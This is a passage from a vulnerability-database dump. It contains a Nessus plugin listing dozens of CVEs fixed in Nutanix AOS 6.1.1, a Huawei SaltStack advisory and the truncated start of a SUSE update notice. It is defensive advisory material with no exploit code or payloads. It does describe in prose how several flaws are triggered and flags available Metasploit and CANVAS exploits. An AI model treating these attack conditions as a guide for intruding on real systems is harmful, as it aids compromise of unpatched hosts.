sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that\n load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3\n (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to\n some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker\n with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker and while the vulnerability is in\n Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete\n access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies\n to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks\n of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM\n Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in\n clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run\n untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This\n vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service\n which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from\n uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread\n Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed\n in Log4j 2.17.0, 2.12.3, and 2.3.1. (CVE-2021-45105)\n\n - In various methods of hid-multitouch.c, there is a possible out of bounds write due to a missing bounds\n check. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-162844689References: Upstream kernel (CVE-2020-0465)\n\n - In do_epoll_ctl and ep_loop_check_proc of eventpoll.c, there is a possible use after free due to a logic\n error. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-147802478References: Upstream kernel (CVE-2020-0466)\n\n - In unix_scm_to_skb of af_unix.c, there is a possible use after free bug due to a race condition. This\n could lead to local escalation of privilege with System execution privileges needed. User interaction is\n not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196926917References:\n Upstream kernel (CVE-2021-0920)\n\n - A flaw double-free memory corruption in the Linux kernel HCI device initialization subsystem was found in\n the way user attach malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the\n system. This flaw affects all the Linux kernel versions starting from 3.13. (CVE-2021-3564)\n\n - A use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way\n user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev()\n together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(),\n hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their\n privileges on the system. This flaw affects the Linux kernel versions prior to 5.13-rc5. (CVE-2021-3573)\n\n - A use-after-free flaw was found in the Linux kernel's Bluetooth subsystem in the way user calls connect to\n the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the\n system or escalate their privileges. The highest threat from this vulnerability is to confidentiality,\n integrity, as well as system availability. (CVE-2021-3752)\n\n - A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size\n increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS\n filesystem otherwise not accessible to them. (CVE-2021-4155)\n\n - A random memory access flaw was found in the Linux kernel's GPU i915 kernel driver functionality in the\n way a user may run malicious code on the GPU. This flaw allows a local user to crash the system or\n escalate their privileges on the system. (CVE-2022-0330)\n\n - A use-after-free flaw was found in the Linux kernel's vmw_execbuf_copy_fence_user function in\n drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx. This flaw allows a local attacker with user privileges\n to cause a privilege escalation problem. (CVE-2022-22942)\n\n - A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed\n by OpenLDAP's slapd server, to trigger an assertion failure. The highest threat from this vulnerability is\n to system availability. (CVE-2020-25709)\n\n - A flaw was found in OpenLDAP in versions before 2.4.56. This flaw allows an attacker who sends a malicious\n packet processed by OpenLDAP to force a failed assertion in csnNormalize23(). The highest threat from this\n vulnerability is to system availability. (CVE-2020-25710)\n\n - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to\n 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the\n server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is\n configured with sessionAttributeValueClassNameFilter=null (the default unless a SecurityManager is used)\n or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker\n knows the relative file path from the storage location used by FileStore to the file the attacker has\n control over; then, using a specifically crafted request, the attacker will be able to trigger remote code\n execution via deserialization of the file under their control. Note that all of conditions a) to d) must\n be true for the attack to succeed. (CVE-2020-9484)\n\n - The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat\n 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local\n attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue\n is only exploitable when Tomcat is configured to persist sessions using the FileStore. (CVE-2022-23181)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-\n free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is\n called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server\n could cause a heap overflow (CVE-2021-26691)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser\n (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the\n vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and\n earlier. (CVE-2021-44790)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an\n attacker who can convince a victim to install a seemingly verifiable package, whose signature header was\n modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is\n to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not escape the password for a SQL\n INSERT or UPDATE statement. (CVE-2022-24407)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to\n 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP\n upgrade connections was not released for WebSocket connections once the connection was closed. This\n created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is\n a setuid tool designed to allow unprivileged users to run commands as privileged users according\n predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly\n and ends trying to execute environment variables as commands. An attacker can leverage this by crafting\n environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully\n executed the attack can cause a local privilege escalation given unprivileged users administrative rights\n on the target machine. (CVE-2021-4034)\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop\n forever for non-prime moduli. Internally this function is used when parsing certificates that contain\n elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point\n encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has\n invalid explicit curve parameters. Since certificate parsing happens prior to verification of the\n certificate signature, any process that parses an externally supplied certificate may thus be subject to a\n denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they\n can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients\n consuming server certificates - TLS servers consuming client certificates - Hosting providers taking\n certificates or private keys from customers - Certificate authorities parsing certification requests from\n subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that\n use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS\n issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate\n which makes it slightly harder to trigger the infinite loop. However any operation which requires the\n public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-\n signed certificate to trigger the loop during verification of the certificate signature. This issue\n affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the\n 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected\n 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered\n discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and\n source_hash URLs can gain full file system access as root on a salt minion. (CVE-2021-21996)\n\n - In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in\n xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).\n (CVE-2021-45960)\n\n - In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for\n m_groupSize. (CVE-2021-46143)\n\n - addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22822)\n\n - build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22823)\n\n - defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22824)\n\n - lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22825)\n\n - nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22826)\n\n - storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22827)\n\n - Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with\n a nonzero XML_CONTEXT_BYTES. (CVE-2022-23852)\n\n - xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks\n for whether a UTF-8 character is valid in a certain context. (CVE-2022-25235)\n\n - xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters\n into namespace URIs. (CVE-2022-25236)\n\n - In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. (CVE-2022-25315)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through\n 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft\n source code that renders different logic than the logical ordering of tokens ingested by compilers and\n interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such\n that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium\n offers the following alternative approach to presenting this concern. An issue is noted in the nature of\n international text that can affect applications that implement support for The Unicode Standard and the\n Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-\n right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can\n further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such\n that the ordering of tokens perceived by human reviewers does not match what will be processed by a\n compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its\n document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also\n provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode\n Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the\n BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading\n visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows\n privilege escalation because supplemental groups are not initialized as expected. Helper programs for\n AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group\n memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data\n which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when\n listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.\n (CVE-2019-17571)\n\n - Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an\n SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent\n through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1 (CVE-2020-9488)\n\n - JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker\n has write access to the Log4j configuration or if the configuration references an LDAP service the\n attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing\n JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to\n CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which\n is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2\n as it addresses numerous other issues from the previous versions. (CVE-2022-23302)\n\n - By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the\n values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be\n included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or\n headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue\n only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default.\n Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized\n SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2022-23305)\n\n - CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw\n V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists. (CVE-2022-23307)\n\n - A flaw memory leak in the Linux kernel performance monitoring subsystem was found in the way if using\n PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to starve the resources causing denial of\n service. (CVE-2020-25704)\n\n - An issue was discovered in the FUSE filesystem implementation in the Linux kernel before 5.10.6, aka\n CID-5d069dbe8aaf. fuse_do_getattr() calls make_bad_inode() in inappropriate situations, causing a system\n crash. NOTE: the original fix for this vulnerability was incomplete, and its incompleteness is tracked as\n CVE-2021-28950. (CVE-2020-36322)\n\n - A heap-based buffer overflow flaw was found in the Linux kernel FireDTV media card driver, where the user\n calls the CA_SEND_MSG ioctl. This flaw allows a local user of the host machine to crash the system or\n escalate privileges on the system. The highest threat from this vulnerability is to confidentiality,\n integrity, as well as system availability. (CVE-2021-42739)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.nutanix.com/advisories/NXSA-AOS-6-1-1.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.1.1', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.1.1 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.1.1', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.1.1 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2021-12-30T12:26:01", "description": "An authentication bypass vulnerability was discovered in SaltStack Salt. An attacker may exploit the vulnerability to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (Vulnerability ID: HWPSIRT-2020-05592)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-11651.\n\nA directory traversal vulnerability was discovered in SaltStack Salt. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. An authenticated attacker may exploit this vulnerability to access any directories. (Vulnerability ID: HWPSIRT-2020-05594)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-11652.\n\nHuawei has released software updates to fix these vulnerabilities. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200715-01-salt-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200715-01-salt-en>)\n\n \n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "huawei", "title": "Security Advisory - Two Vulnerabilities in SaltStack Salt", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-07-15T00:00:00", "id": "HUAWEI-SA-20200715-01-SALT", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200715-01-salt-en", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-11-08T04:09:48", "description": "An update that fixes two vulnerabilities is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this 